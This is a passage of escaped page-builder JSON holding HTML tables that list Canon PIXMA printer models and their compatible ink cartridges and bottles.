width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iX6770<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-755XXL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iX6870<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-755XXL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG2570S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG2577S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ac4d506\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2645364\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62e0d92\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG3570<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG3670<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG7570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP160<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP180<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP228<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP237<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP245<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP258<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP276<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2be4aef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d0f60c7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP287<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP460<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP476<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP486<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP496<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP497<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP500<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP520<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP530<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP568<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP600<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b289177\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b0d2e40\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP610<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP628<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP638<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP648<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800R<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP810<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP830<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td 